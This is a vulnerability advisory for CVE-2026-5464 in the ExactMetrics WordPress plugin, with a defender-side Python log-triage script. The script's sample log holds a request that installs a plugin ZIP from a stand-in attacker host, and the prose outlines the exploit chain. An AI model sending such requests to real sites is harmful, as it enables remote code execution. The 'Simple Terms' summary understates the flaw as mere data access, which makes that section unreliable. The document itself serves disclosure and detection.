CVE-2026-5464 HIGH

CVE-2026-5464: ExactMetrics <= 9.1.2 - Authenticated (Editor+) Arbitrary Plugin Installation/Activation via exactmetrics_connect_process

Vendor Smub
Product ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)
Weakness CWE-862 · Missing authorization
Published April 23, 2026
Last update April 23, 2026

CVSS base score

7.2/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction None
Confidentiality High
Integrity High

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

What the vulnerability does

Description

The ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation in all versions up to, and including, 9.1.2. This is due to the reports page exposing the 'onboarding_key' transient to any user with the 'exactmetrics_view_dashboard' capability. This key is the sole authorization gate for the '/wp-json/exactmetrics/v1/onboarding/connect-url' REST endpoint, which returns a one-time hash (OTH) token. This OTH token is then the only credential checked by the 'exactmetrics_connect_process' AJAX endpoint — which has no capability check, no nonce verification, and accepts an arbitrary plugin ZIP URL via the file parameter for installation and activation. This makes it possible for authenticated attackers, with Editor-level access and above granted the report viewing permission, to install and activate arbitrary plugins from attacker-controlled URLs, leading to Remote Code Execution.
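The chain described above (leaked transient, connect-url REST call, connect_process AJAX call) leaves a trail in ordinary web server access logs. The Python script below is an added defender-side example, not code from this advisory or from the ExactMetrics plugin: it parses combined-format access log lines (a constructed sample is embedded), flags requests to the two endpoints the advisory names, records the host of any ZIP URL passed in the 'file' query parameter, lists source IPs that completed both stages, and includes a version check against the affected range (<= 9.1.2). The log format, the sample IPs and the example.invalid host are assumptions; 'downloads.wordpress.org' is used only as an illustrative trusted host.

```python
"""Access-log triage for the CVE-2026-5464 request chain (added example, not plugin code)."""
import re
from urllib.parse import parse_qs, urlparse

REST_CONNECT_URL = "/wp-json/exactmetrics/v1/onboarding/connect-url"
AJAX_ACTION = "exactmetrics_connect_process"
LAST_AFFECTED = (9, 1, 2)          # all versions up to and including 9.1.2 are affected
TRUSTED_ZIP_HOSTS = {"downloads.wordpress.org"}   # assumption: adjust to your policy

# Apache/nginx "combined" log format (assumed): ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one host completes the chain, one is denied at connect-url, one is noise.
SAMPLE_LOG = """\
203.0.113.10 - - [23/Apr/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=exactmetrics_reports HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [23/Apr/2026:10:00:05 +0000] "GET /wp-json/exactmetrics/v1/onboarding/connect-url HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.10 - - [23/Apr/2026:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=exactmetrics_connect_process&file=http%3A%2F%2Fexample.invalid%2Fplugin.zip HTTP/1.1" 200 77 "-" "curl/8.0"
198.51.100.7 - - [23/Apr/2026:10:01:00 +0000] "GET /wp-json/exactmetrics/v1/onboarding/connect-url HTTP/1.1" 401 120 "-" "Mozilla/5.0"
192.0.2.5 - - [23/Apr/2026:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
"""


def is_affected(version: str) -> bool:
    """True when a dotted plugin version falls inside the affected range (<= 9.1.2)."""
    parts = tuple(int(p) for p in version.strip().split("."))
    parts = (parts + (0, 0, 0))[:3]          # pad short versions such as "9.1"
    return parts <= LAST_AFFECTED


def scan(log_text: str) -> list:
    """Return one finding per log line that hits either endpoint of the chain."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # not combined format; skip silently
        url = urlparse(m.group("target"))
        qs = parse_qs(url.query)
        stage, zip_host = None, None
        if url.path == REST_CONNECT_URL:
            stage = "connect-url"             # step 1: OTH token request
        elif url.path.endswith("/admin-ajax.php") and AJAX_ACTION in qs.get("action", []):
            stage = "connect_process"         # step 2: install/activate request
            file_url = qs.get("file", [""])[0]
            zip_host = urlparse(file_url).hostname or ""
        if stage:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "stage": stage,
                "status": int(m.group("status")),
                "zip_host": zip_host,
                "untrusted_zip": bool(zip_host) and zip_host not in TRUSTED_ZIP_HOSTS,
            })
    return findings


def full_chain_ips(findings: list) -> list:
    """Source IPs that got a 200 from connect-url and then called connect_process."""
    stages = {}
    for f in findings:
        if f["stage"] == "connect-url" and f["status"] != 200:
            continue                          # denied: no token issued, chain incomplete
        stages.setdefault(f["ip"], set()).add(f["stage"])
    return sorted(ip for ip, s in stages.items() if {"connect-url", "connect_process"} <= s)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print("completed chain:", full_chain_ips(scan(SAMPLE_LOG)))
    print("9.1.2 affected:", is_affected("9.1.2"), "| 9.1.3 affected:", is_affected("9.1.3"))
```

Parameters sent in a POST body never reach a standard access log, so the 'action' and 'file' values are only visible here when a client put them in the query string; treat a 200 from the connect-url REST route as the reliable indicator and confirm the second stage from WordPress-side evidence (newly installed or activated plugins, plugin-installation hooks, or the plugin's own logging).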

Explanation of Vulnerability in Simple Terms

Summary

ExactMetrics versions up to 9.1.2 contain an authorization bypass that allows high-privilege users to read, modify, or delete site data without proper permission checks. An administrator or editor can access sensitive analytics information and configuration settings they should not be able to reach. Sites running affected versions should update immediately to prevent unauthorized data access.

What an attacker can do

Attacker Capabilities

Read, modify, or delete site data and analytics configuration without proper authorization checks.

Potential impact on your site

Site Impact

Privileged users can access or alter analytics data and plugin settings beyond their intended permissions.

Conditions required to exploit

Prerequisites

Attacker must have high-level WordPress privileges (administrator or editor role).

Key dates

Disclosure timeline

April 23, 2026 CVE published
April 23, 2026 Record updated